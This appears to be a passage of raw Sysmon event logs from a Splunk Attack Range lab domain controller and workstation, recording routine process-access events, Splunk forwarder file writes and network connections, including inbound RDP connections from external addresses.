10341000x80000000000000001048754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.104{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.104{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.104{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8938-6151-077A-00000000FC01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.104{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8938-6151-077A-00000000FC01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.098{5EBD8912-8938-6151-077A-00000000FC01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.004{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF6102B50C9CAEF05962DF7513875C31,SHA256=237D27B2C8DD089673CA7A03FCA171AA3DC19B07CD2E32D40E32C353CD4ADB98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977367Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:56.723{69CF5F33-7F27-614D-0B00-00000000FD01}6243320C:\Windows\system32\lsass.exe{69CF5F33-7F0C-614D-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000977366Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:56.192{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A3AB9E1A7999711031106E79B28E7E,SHA256=38E6E843AC677CB7B351997153D8F0566DADC2EBC67BA77E8B96F25ADF1C455F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977365Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:56.020{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=273DC99CC77F7D9F277479C705158DC0,SHA256=11E80794665F09ADB8CF936BBDAA109651567BA862CC06E61F8EC73DAA5C7205,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977368Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:57.208{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0148BC1C59307D4F1247A2B0D82A0E67,SHA256=8299D444DCDF6356D186236F627FFBFE84B329FC8000D5ACB9CC50C92EDDEF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:57.765{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ADAEA4B199C1F22850D8AE31DCF9E79,SHA256=0FE7FA4B42A41A232CD147648227A01CDAFFBFF8C499B2C414891DE31A3CF8EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:57.081{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7DAC844CBDB073B5C06F53CD3EDA8E6,SHA256=76E67560F086851BFD706E14B0BD353F3AB748061B562DFA85AF56587216C411,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977372Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:55.525{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50209-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977371Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:55.372{69CF5F33-7F0C-614D-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59299-false10.0.1.14-445microsoft-ds 23542300x8000000000000000977370Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:58.255{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7ACD60066FA387D81203CBD3AC172549,SHA256=71DE857188F50C3AEB7299AA8E5256872B0367B586D0512F4F0D1B4AD4B8841C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977369Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:58.223{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA184E64628267BDD893542533B59331,SHA256=42055E182B726B4B4ACC7671B19325988700ED06BE7B47748677A8F3F9C3B6E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:58.964{5EBD8912-7F30-614D-0D00-00000000FC01}8886076C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.773{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50385-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:56.435{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15-59299-false10.0.1.14win-dc-429.attackrange.local445microsoft-ds 23542300x80000000000000001048762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:58.099{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9F82422B249B3D928AEC2CD8B9AA326,SHA256=E379D975C810F07A311892D71B6113DCEEAADF4950671B4C16F9C4ABD21922BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977376Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:56.680{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59300-false10.0.1.12-8000- 354300x8000000000000000977375Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:56.133{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55491-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977374Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:55.999{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-41529-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977373Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:59.239{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A11A28F7148E48ADC84C330185FDF3C,SHA256=9EA5F1E0BEDF75D88A7A48298DC4735FB82F9819702E00AF92DA2438903C5CFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:59.133{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB2E0FB9D06474CFD9BF1E14ACC1347A,SHA256=98343781C5C75E0CBA30F355B4DF8ADADCB4BBAF41F5F9CB75426A1518BC95B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:58.771{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53257-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:58.701{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56598-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:00.550{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C33EE2A935C53D7D75E1FFE694DD8DD,SHA256=128F827DCCD3CD2285FA351E7ABCDB66DCBC0F0E15A3F3454FBE2FC3F0ED9CBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:00.147{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CC47C29CD4AABF348C917202DCB40FF,SHA256=08498D2D36856D59F9D799A445AB99915ED19950BAB6A38056BA63B42B676324,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977377Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:00.255{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27D809B1BFE6DCD6D4B8E5B51C808A0D,SHA256=F93668C9BA05DE83D0E7F1074AB7D232FC94D91804B718B4FD9245595C7939DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977379Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:01.255{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00673DA5DA4FEFAD1CF409E3A90ED3A0,SHA256=D7F8596E1E5A73334A0D507676C926967F4B56A5165D85786189E6CDB501679C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:01.216{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DC4A49DD28A09326C2852ED90525670,SHA256=2D359B66865B2AF5CE95F8209CE97B02F536837F99EBD2778010B74FF097C183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977378Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:01.145{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=141720158F871893C33AD13BFECBDF30,SHA256=415F649523608778055C3A592BE06ED7386212F66A4CE63BA197D519B655F3FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:02.225{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92FA2024D845EAFFB8C8B2E3A8E5D42A,SHA256=BBADAFC9BCB13FF02469C17197E9EFEA77F293FCF35F9284331AF8B16EC4F721,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977380Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:02.270{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F14633C187102A6DE843D498515EB2FE,SHA256=33EFC1B979EC8F1E2DD91D35350F4964BB372A413816F55FED7701F374E94E0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:03.240{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCA505CAE85BA84527A84676B321EFB1,SHA256=FF8B4AFEF32780D30FBD5B37AE9102447303B2A3D5ACF7118157B1D115C73A6A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977383Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:00.177{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-12293-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977382Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:03.340{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C4534BFE4F3F3F00D9D037CF07A2769,SHA256=01382527CF8E8A7464BBB88D9A39AAFA8F2CBB60706797D523137E36A1AE78BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977381Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:03.278{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4D36ECFC14C3975526CEEDD6C4D806,SHA256=64CEB2AD5682A77D16E49FDB067F8B82F9D94C680C7E62F3287124926FC465B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977385Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:01.844{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59301-false10.0.1.12-8000- 23542300x8000000000000000977384Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:04.293{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24D1AD4E0D3216435BFD2907A3E82812,SHA256=EFB0743B46BD42F2F58A8A4A6E3B6032DA35EDBE163B77980D855495A90C9A56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:04.240{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591C357B8AC600D9039E6481681702E7,SHA256=13762CFFDF11CF651B12E940D3EEA997B5ECCD026A28283EB9D58766AFE73CED,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977390Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:03.119{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57735-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977389Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:02.725{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com49799-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977388Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:02.354{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-24791-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977387Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:05.481{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4EEED0E155D960E3565CF9AF78A3068E,SHA256=08A081D21D740967E62B9A047881EE59A614E55D0D05B92BA1F30E30F80FA56C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977386Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:05.293{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C1D23B14262FA71C8E76B587C286874,SHA256=D318599D1CAEB77DC71B033B2918BB1EB8FA05482A0511DA4F972C50034F1ECE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:03.898{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53258-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:03.623{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com49426-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:05.724{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:05.324{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program 